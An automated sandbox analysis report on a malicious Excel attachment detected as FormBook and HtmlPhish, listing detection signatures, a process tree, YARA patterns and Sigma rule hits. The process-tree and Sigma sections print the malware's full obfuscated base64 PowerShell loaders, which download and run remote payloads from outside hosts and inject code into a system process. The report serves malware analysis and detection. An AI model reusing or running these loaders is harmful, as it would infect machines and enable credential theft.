Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI-02911202409#.xla.xlsx

Overview

General Information

Sample name:PI-02911202409#.xla.xlsx
Analysis ID:1566416
MD5:bab0159cad38d589789b94ced5e7439a
SHA1:34e7944d8c1d559bbae01135adb7c0ab16832465
SHA256:79c0ec73753eaf5fff4d06717696ff80597b34462c77c425867bdb70ca4c544e
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3280 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3600 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3752 cmdline: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3780 cmdline: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3888 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3896 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3980 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 4024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • aspnet_compiler.exe (PID: 2144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Process Memory Space: powershell.exe PID: 4024JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            16.2.aspnet_compiler.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            16.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              16.2.aspnet_compiler.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSg
              Sigma detected: File With Uncommon Extension Created By An Office Application
              Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3280, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 3980, ProcessName: wscript.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 